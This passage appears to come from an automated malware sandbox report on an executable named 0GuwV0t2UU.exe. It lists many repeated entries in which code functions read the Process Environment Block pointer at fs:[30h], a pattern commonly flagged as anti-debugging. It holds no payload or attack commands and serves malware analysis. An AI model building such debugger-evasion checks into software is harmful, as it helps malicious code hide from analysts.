      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F5B0 mov eax, dword ptr fs:[00000030h]7_2_3782F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F5B0 mov eax, dword ptr fs:[00000030h]7_2_3782F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F5B0 mov eax, dword ptr fs:[00000030h]7_2_3782F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F5B0 mov eax, dword ptr fs:[00000030h]7_2_3782F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F5B0 mov eax, dword ptr fs:[00000030h]7_2_3782F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F5B0 mov eax, dword ptr fs:[00000030h]7_2_3782F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378935BA mov eax, dword ptr fs:[00000030h]7_2_378935BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378935BA mov eax, dword ptr fs:[00000030h]7_2_378935BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378935BA mov eax, dword ptr fs:[00000030h]7_2_378935BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378935BA mov eax, dword ptr fs:[00000030h]7_2_378935BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BF5BE mov eax, dword ptr fs:[00000030h]7_2_378BF5BE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3789D5B0 mov eax, dword ptr fs:[00000030h]7_2_3789D5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3789D5B0 mov eax, dword ptr fs:[00000030h]7_2_3789D5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D35B6 mov eax, dword ptr fs:[00000030h]7_2_378D35B6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378355C0 mov eax, dword ptr fs:[00000030h]7_2_378355C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D55C9 mov eax, dword ptr fs:[00000030h]7_2_378D55C9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3787D5D0 mov eax, dword ptr fs:[00000030h]7_2_3787D5D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3787D5D0 mov ecx, dword ptr fs:[00000030h]7_2_3787D5D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378295DA mov eax, dword ptr fs:[00000030h]7_2_378295DA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D35D7 mov eax, dword ptr fs:[00000030h]7_2_378D35D7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D35D7 mov eax, dword ptr fs:[00000030h]7_2_378D35D7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D35D7 mov eax, dword ptr fs:[00000030h]7_2_378D35D7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215F4 mov eax, dword ptr fs:[00000030h]7_2_378215F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215F4 mov eax, dword ptr fs:[00000030h]7_2_378215F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215F4 mov eax, dword ptr fs:[00000030h]7_2_378215F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215F4 mov eax, dword ptr fs:[00000030h]7_2_378215F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215F4 mov eax, dword ptr fs:[00000030h]7_2_378215F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215F4 mov eax, dword ptr fs:[00000030h]7_2_378215F4
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37837505 mov eax, dword ptr fs:[00000030h]7_2_37837505
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37837505 mov ecx, dword ptr fs:[00000030h]7_2_37837505
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BB52F mov eax, dword ptr fs:[00000030h]7_2_378BB52F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AF525 mov eax, dword ptr fs:[00000030h]7_2_378AF525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AF525 mov eax, dword ptr fs:[00000030h]7_2_378AF525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AF525 mov eax, dword ptr fs:[00000030h]7_2_378AF525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AF525 mov eax, dword ptr fs:[00000030h]7_2_378AF525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AF525 mov eax, dword ptr fs:[00000030h]7_2_378AF525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AF525 mov eax, dword ptr fs:[00000030h]7_2_378AF525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AF525 mov eax, dword ptr fs:[00000030h]7_2_378AF525
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783D530 mov eax, dword ptr fs:[00000030h]7_2_3783D530
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783D530 mov eax, dword ptr fs:[00000030h]7_2_3783D530
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780D534 mov eax, dword ptr fs:[00000030h]7_2_3780D534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780D534 mov eax, dword ptr fs:[00000030h]7_2_3780D534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780D534 mov eax, dword ptr fs:[00000030h]7_2_3780D534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780D534 mov eax, dword ptr fs:[00000030h]7_2_3780D534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780D534 mov eax, dword ptr fs:[00000030h]7_2_3780D534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780D534 mov eax, dword ptr fs:[00000030h]7_2_3780D534
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D5537 mov eax, dword ptr fs:[00000030h]7_2_378D5537
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AB550 mov eax, dword ptr fs:[00000030h]7_2_378AB550
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AB550 mov eax, dword ptr fs:[00000030h]7_2_378AB550
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AB550 mov eax, dword ptr fs:[00000030h]7_2_378AB550
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F758F mov eax, dword ptr fs:[00000030h]7_2_377F758F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F758F mov eax, dword ptr fs:[00000030h]7_2_377F758F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F758F mov eax, dword ptr fs:[00000030h]7_2_377F758F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783B570 mov eax, dword ptr fs:[00000030h]7_2_3783B570
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783B570 mov eax, dword ptr fs:[00000030h]7_2_3783B570
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37809486 mov eax, dword ptr fs:[00000030h]7_2_37809486
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37809486 mov eax, dword ptr fs:[00000030h]7_2_37809486
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378334B0 mov eax, dword ptr fs:[00000030h]7_2_378334B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A74B0 mov eax, dword ptr fs:[00000030h]7_2_378A74B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D54DB mov eax, dword ptr fs:[00000030h]7_2_378D54DB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A94E0 mov eax, dword ptr fs:[00000030h]7_2_378A94E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D14F6 mov eax, dword ptr fs:[00000030h]7_2_378D14F6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D14F6 mov eax, dword ptr fs:[00000030h]7_2_378D14F6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782340D mov eax, dword ptr fs:[00000030h]7_2_3782340D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37887410 mov eax, dword ptr fs:[00000030h]7_2_37887410
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B440 mov eax, dword ptr fs:[00000030h]7_2_3780B440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B440 mov eax, dword ptr fs:[00000030h]7_2_3780B440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B440 mov eax, dword ptr fs:[00000030h]7_2_3780B440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B440 mov eax, dword ptr fs:[00000030h]7_2_3780B440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B440 mov eax, dword ptr fs:[00000030h]7_2_3780B440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B440 mov eax, dword ptr fs:[00000030h]7_2_3780B440
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F74B0 mov eax, dword ptr fs:[00000030h]7_2_377F74B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F74B0 mov eax, dword ptr fs:[00000030h]7_2_377F74B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BF453 mov eax, dword ptr fs:[00000030h]7_2_378BF453
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AB450 mov eax, dword ptr fs:[00000030h]7_2_378AB450
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AB450 mov eax, dword ptr fs:[00000030h]7_2_378AB450
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AB450 mov eax, dword ptr fs:[00000030h]7_2_378AB450
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AB450 mov eax, dword ptr fs:[00000030h]7_2_378AB450
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37801460 mov eax, dword ptr fs:[00000030h]7_2_37801460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37801460 mov eax, dword ptr fs:[00000030h]7_2_37801460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37801460 mov eax, dword ptr fs:[00000030h]7_2_37801460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37801460 mov eax, dword ptr fs:[00000030h]7_2_37801460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37801460 mov eax, dword ptr fs:[00000030h]7_2_37801460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781F460 mov eax, dword ptr fs:[00000030h]7_2_3781F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781F460 mov eax, dword ptr fs:[00000030h]7_2_3781F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781F460 mov eax, dword ptr fs:[00000030h]7_2_3781F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781F460 mov eax, dword ptr fs:[00000030h]7_2_3781F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781F460 mov eax, dword ptr fs:[00000030h]7_2_3781F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781F460 mov eax, dword ptr fs:[00000030h]7_2_3781F460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D547F mov eax, dword ptr fs:[00000030h]7_2_378D547F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB480 mov eax, dword ptr fs:[00000030h]7_2_377FB480
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D539D mov eax, dword ptr fs:[00000030h]7_2_378D539D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3785739A mov eax, dword ptr fs:[00000030h]7_2_3785739A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3785739A mov eax, dword ptr fs:[00000030h]7_2_3785739A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378333A0 mov eax, dword ptr fs:[00000030h]7_2_378333A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378333A0 mov eax, dword ptr fs:[00000030h]7_2_378333A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378233A5 mov eax, dword ptr fs:[00000030h]7_2_378233A5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F9353 mov eax, dword ptr fs:[00000030h]7_2_377F9353
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F9353 mov eax, dword ptr fs:[00000030h]7_2_377F9353
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FD34C mov eax, dword ptr fs:[00000030h]7_2_377FD34C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FD34C mov eax, dword ptr fs:[00000030h]7_2_377FD34C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A13B9 mov eax, dword ptr fs:[00000030h]7_2_378A13B9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A13B9 mov eax, dword ptr fs:[00000030h]7_2_378A13B9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A13B9 mov eax, dword ptr fs:[00000030h]7_2_378A13B9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F7330 mov eax, dword ptr fs:[00000030h]7_2_377F7330
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BB3D0 mov ecx, dword ptr fs:[00000030h]7_2_378BB3D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BF3E6 mov eax, dword ptr fs:[00000030h]7_2_378BF3E6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D53FC mov eax, dword ptr fs:[00000030h]7_2_378D53FC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788930B mov eax, dword ptr fs:[00000030h]7_2_3788930B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788930B mov eax, dword ptr fs:[00000030h]7_2_3788930B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788930B mov eax, dword ptr fs:[00000030h]7_2_3788930B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C132D mov eax, dword ptr fs:[00000030h]7_2_378C132D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C132D mov eax, dword ptr fs:[00000030h]7_2_378C132D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F32A mov eax, dword ptr fs:[00000030h]7_2_3782F32A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D5341 mov eax, dword ptr fs:[00000030h]7_2_378D5341
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BF367 mov eax, dword ptr fs:[00000030h]7_2_378BF367
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37807370 mov eax, dword ptr fs:[00000030h]7_2_37807370
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37807370 mov eax, dword ptr fs:[00000030h]7_2_37807370
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37807370 mov eax, dword ptr fs:[00000030h]7_2_37807370
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A3370 mov eax, dword ptr fs:[00000030h]7_2_378A3370
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D5283 mov eax, dword ptr fs:[00000030h]7_2_378D5283
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783329E mov eax, dword ptr fs:[00000030h]7_2_3783329E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783329E mov eax, dword ptr fs:[00000030h]7_2_3783329E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378152A0 mov eax, dword ptr fs:[00000030h]7_2_378152A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378152A0 mov eax, dword ptr fs:[00000030h]7_2_378152A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378152A0 mov eax, dword ptr fs:[00000030h]7_2_378152A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378152A0 mov eax, dword ptr fs:[00000030h]7_2_378152A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378972A0 mov eax, dword ptr fs:[00000030h]7_2_378972A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378972A0 mov eax, dword ptr fs:[00000030h]7_2_378972A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C92A6 mov eax, dword ptr fs:[00000030h]7_2_378C92A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C92A6 mov eax, dword ptr fs:[00000030h]7_2_378C92A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C92A6 mov eax, dword ptr fs:[00000030h]7_2_378C92A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C92A6 mov eax, dword ptr fs:[00000030h]7_2_378C92A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378892BC mov eax, dword ptr fs:[00000030h]7_2_378892BC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378892BC mov eax, dword ptr fs:[00000030h]7_2_378892BC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378892BC mov ecx, dword ptr fs:[00000030h]7_2_378892BC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378892BC mov ecx, dword ptr fs:[00000030h]7_2_378892BC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F9240 mov eax, dword ptr fs:[00000030h]7_2_377F9240
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F9240 mov eax, dword ptr fs:[00000030h]7_2_377F9240
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782B2C0 mov eax, dword ptr fs:[00000030h]7_2_3782B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782B2C0 mov eax, dword ptr fs:[00000030h]7_2_3782B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782B2C0 mov eax, dword ptr fs:[00000030h]7_2_3782B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782B2C0 mov eax, dword ptr fs:[00000030h]7_2_3782B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782B2C0 mov eax, dword ptr fs:[00000030h]7_2_3782B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782B2C0 mov eax, dword ptr fs:[00000030h]7_2_3782B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782B2C0 mov eax, dword ptr fs:[00000030h]7_2_3782B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378092C5 mov eax, dword ptr fs:[00000030h]7_2_378092C5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378092C5 mov eax, dword ptr fs:[00000030h]7_2_378092C5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F2D0 mov eax, dword ptr fs:[00000030h]7_2_3782F2D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F2D0 mov eax, dword ptr fs:[00000030h]7_2_3782F2D0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED mov eax, dword ptr fs:[00000030h]7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D52E2 mov eax, dword ptr fs:[00000030h]7_2_378D52E2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BF2F8 mov eax, dword ptr fs:[00000030h]7_2_378BF2F8
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AB2F0 mov eax, dword ptr fs:[00000030h]7_2_378AB2F0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AB2F0 mov eax, dword ptr fs:[00000030h]7_2_378AB2F0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F92FF mov eax, dword ptr fs:[00000030h]7_2_377F92FF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37837208 mov eax, dword ptr fs:[00000030h]7_2_37837208
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37837208 mov eax, dword ptr fs:[00000030h]7_2_37837208
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D5227 mov eax, dword ptr fs:[00000030h]7_2_378D5227
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB2D3 mov eax, dword ptr fs:[00000030h]7_2_377FB2D3
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB2D3 mov eax, dword ptr fs:[00000030h]7_2_377FB2D3
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB2D3 mov eax, dword ptr fs:[00000030h]7_2_377FB2D3
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783724D mov eax, dword ptr fs:[00000030h]7_2_3783724D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788D250 mov ecx, dword ptr fs:[00000030h]7_2_3788D250
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BB256 mov eax, dword ptr fs:[00000030h]7_2_378BB256
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BB256 mov eax, dword ptr fs:[00000030h]7_2_378BB256
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CD26B mov eax, dword ptr fs:[00000030h]7_2_378CD26B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CD26B mov eax, dword ptr fs:[00000030h]7_2_378CD26B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37841270 mov eax, dword ptr fs:[00000030h]7_2_37841270
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37841270 mov eax, dword ptr fs:[00000030h]7_2_37841270
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37829274 mov eax, dword ptr fs:[00000030h]7_2_37829274
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B5180 mov eax, dword ptr fs:[00000030h]7_2_378B5180
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B5180 mov eax, dword ptr fs:[00000030h]7_2_378B5180
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF172 mov eax, dword ptr fs:[00000030h]7_2_377FF172
